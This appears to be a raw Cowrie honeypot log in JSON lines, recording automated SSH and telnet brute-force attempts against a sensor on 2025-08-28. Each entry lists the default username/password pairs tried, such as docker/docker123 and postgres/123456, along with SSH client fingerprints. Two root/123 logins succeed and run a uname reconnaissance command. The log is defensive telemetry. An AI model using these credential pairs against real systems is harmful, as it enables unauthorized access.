{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:04:14.467466Z","src_ip":"212.227.125.160","session":"da80d40cfa8b"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T07:04:15.129351Z","src_ip":"212.227.125.160","session":"da80d40cfa8b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:16.346738Z","src_ip":"212.227.125.160","session":"da80d40cfa8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37886,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e3eeb2ba5b3","protocol":"ssh","message":"New connection: 212.227.235.229:37886 (1.2.3.4:22) [session: 8e3eeb2ba5b3]","sensor":"my-vps","timestamp":"2025-08-28T07:04:20.877699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:04:20.878453Z","src_ip":"212.227.235.229","session":"8e3eeb2ba5b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:04:21.129335Z","src_ip":"212.227.235.229","session":"8e3eeb2ba5b3"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T07:04:21.883388Z","src_ip":"212.227.235.229","session":"8e3eeb2ba5b3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:23.138340Z","src_ip":"212.227.235.229","session":"8e3eeb2ba5b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48460,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a6d966e86d4","protocol":"ssh","message":"New connection: 212.227.125.160:48460 (1.2.3.4:22) [session: 5a6d966e86d4]","sensor":"my-vps","timestamp":"2025-08-28T07:04:30.805001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:04:30.805850Z","src_ip":"212.227.125.160","session":"5a6d966e86d4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:04:31.032124Z","src_ip":"212.227.125.160","session":"5a6d966e86d4"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:04:31.704113Z","src_ip":"212.227.125.160","session":"5a6d966e86d4"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":55262,"dst_ip":"1.2.3.4","dst_port":23,"session":"3bca593756d1","protocol":"telnet","message":"New connection: 3.130.96.91:55262 (1.2.3.4:23) [session: 3bca593756d1]","sensor":"my-vps","timestamp":"2025-08-28T07:04:31.984383Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:32.929702Z","src_ip":"212.227.125.160","session":"5a6d966e86d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43094,"dst_ip":"1.2.3.4","dst_port":22,"session":"8186af52334f","protocol":"ssh","message":"New connection: 212.227.235.229:43094 (1.2.3.4:22) [session: 8186af52334f]","sensor":"my-vps","timestamp":"2025-08-28T07:04:37.360724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:04:37.361717Z","src_ip":"212.227.235.229","session":"8186af52334f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:04:37.623795Z","src_ip":"212.227.235.229","session":"8186af52334f"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:04:38.412715Z","src_ip":"212.227.235.229","session":"8186af52334f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:39.677398Z","src_ip":"212.227.235.229","session":"8186af52334f"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":58492,"dst_ip":"1.2.3.4","dst_port":23,"session":"fee088fc89d1","protocol":"telnet","message":"New connection: 3.130.96.91:58492 (1.2.3.4:23) [session: fee088fc89d1]","sensor":"my-vps","timestamp":"2025-08-28T07:04:40.953303Z"}
{"eventid":"cowrie.session.closed","duration":0.001363992691040039,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:40.954596Z","src_ip":"3.130.96.91","session":"fee088fc89d1"}
{"eventid":"cowrie.session.closed","duration":10.12699031829834,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:42.111254Z","src_ip":"3.130.96.91","session":"3bca593756d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58008,"dst_ip":"1.2.3.4","dst_port":22,"session":"47faeb1d3ffc","protocol":"ssh","message":"New connection: 212.227.125.160:58008 (1.2.3.4:22) [session: 47faeb1d3ffc]","sensor":"my-vps","timestamp":"2025-08-28T07:04:47.126151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:04:47.127056Z","src_ip":"212.227.125.160","session":"47faeb1d3ffc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:04:47.343119Z","src_ip":"212.227.125.160","session":"47faeb1d3ffc"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:04:47.991279Z","src_ip":"212.227.125.160","session":"47faeb1d3ffc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:04:48.500931Z","src_ip":"212.227.125.160","session":"47faeb1d3ffc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:04:48.501743Z","src_ip":"212.227.125.160","session":"47faeb1d3ffc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:48.718475Z","src_ip":"212.227.125.160","session":"47faeb1d3ffc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:48.719589Z","src_ip":"212.227.125.160","session":"47faeb1d3ffc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45266,"dst_ip":"1.2.3.4","dst_port":22,"session":"a969209a99d6","protocol":"ssh","message":"New connection: 212.227.235.229:45266 (1.2.3.4:22) [session: a969209a99d6]","sensor":"my-vps","timestamp":"2025-08-28T07:04:53.557812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:04:53.558809Z","src_ip":"212.227.235.229","session":"a969209a99d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:04:53.805629Z","src_ip":"212.227.235.229","session":"a969209a99d6"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:04:54.548054Z","src_ip":"212.227.235.229","session":"a969209a99d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:04:55.059842Z","src_ip":"212.227.235.229","session":"a969209a99d6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:04:55.060665Z","src_ip":"212.227.235.229","session":"a969209a99d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:55.309007Z","src_ip":"212.227.235.229","session":"a969209a99d6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:55.310088Z","src_ip":"212.227.235.229","session":"a969209a99d6"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":33300,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca94f6111b9c","protocol":"telnet","message":"New connection: 8.222.212.69:33300 (1.2.3.4:23) [session: ca94f6111b9c]","sensor":"my-vps","timestamp":"2025-08-28T07:04:56.475731Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39402,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0f26c241fe1","protocol":"ssh","message":"New connection: 212.227.125.160:39402 (1.2.3.4:22) [session: e0f26c241fe1]","sensor":"my-vps","timestamp":"2025-08-28T07:05:03.292611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:05:03.306427Z","src_ip":"212.227.125.160","session":"e0f26c241fe1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:05:03.511176Z","src_ip":"212.227.125.160","session":"e0f26c241fe1"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:05:04.391905Z","src_ip":"212.227.125.160","session":"e0f26c241fe1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:05:05.611964Z","src_ip":"212.227.125.160","session":"e0f26c241fe1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50530,"dst_ip":"1.2.3.4","dst_port":22,"session":"5824265a78ff","protocol":"ssh","message":"New connection: 212.227.235.229:50530 (1.2.3.4:22) [session: 5824265a78ff]","sensor":"my-vps","timestamp":"2025-08-28T07:05:09.974260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:05:09.975314Z","src_ip":"212.227.235.229","session":"5824265a78ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:05:10.234381Z","src_ip":"212.227.235.229","session":"5824265a78ff"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:05:11.014897Z","src_ip":"212.227.235.229","session":"5824265a78ff"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:05:12.276638Z","src_ip":"212.227.235.229","session":"5824265a78ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52718,"dst_ip":"1.2.3.4","dst_port":22,"session":"7331fb7e07ed","protocol":"ssh","message":"New connection: 212.227.125.160:52718 (1.2.3.4:22) [session: 7331fb7e07ed]","sensor":"my-vps","timestamp":"2025-08-28T07:05:19.898632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:05:19.899369Z","src_ip":"212.227.125.160","session":"7331fb7e07ed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:05:20.131781Z","src_ip":"212.227.125.160","session":"7331fb7e07ed"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:05:20.836228Z","src_ip":"212.227.125.160","session":"7331fb7e07ed"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:05:22.070218Z","src_ip":"212.227.125.160","session":"7331fb7e07ed"}
